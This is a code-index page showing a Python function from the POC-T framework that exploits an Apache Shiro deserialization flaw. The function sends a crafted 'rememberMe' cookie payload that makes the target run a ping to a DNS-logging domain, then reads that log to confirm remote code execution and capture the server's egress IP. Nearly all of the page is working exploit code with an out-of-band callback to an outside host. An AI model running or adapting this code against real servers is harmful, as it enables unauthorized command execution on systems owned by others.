hub / github.com/Xyntax/POC-T / poc

Function poc

script/shiro-deserial-rce.py:25–46
(url)

Source from the content-addressed store, hash-verified

def poc(url):
    if '://' not in url:
        target = 'https://%s' % url if ':443' in url else 'http://%s' % url
    else:
        target = url
    try:
        cloudeye = CloudEye()
        domain = cloudeye.getRandomDomain('shiro')  # set the DNS marker domain group
        rce_command = 'ping -n 3 %s || ping -c 3 %s' % (domain, domain)  # command executed on the target machine
        payload = generator(rce_command, JAR_FILE)  # generate the payload
        requests.get(target, cookies={'rememberMe': payload.decode()}, timeout=10)  # send the verification request

        dnslog = cloudeye.getDnsRecord(delay=2)
        if domain in dnslog:
            msg = url
            for each in re.findall(r'client (.*)#', dnslog):  # get the egress IP
                msg += ' - ' + each
            return msg

    except Exception, e:
        pass
    return False


def generator(command, fp):

Callers

nothing calls this directly

Calls 5

getRandomDomain · Method · 0.95
getDnsRecord · Method · 0.95
CloudEye · Class · 0.90
generator · Function · 0.85
get · Method · 0.80

Tested by

no test coverage detected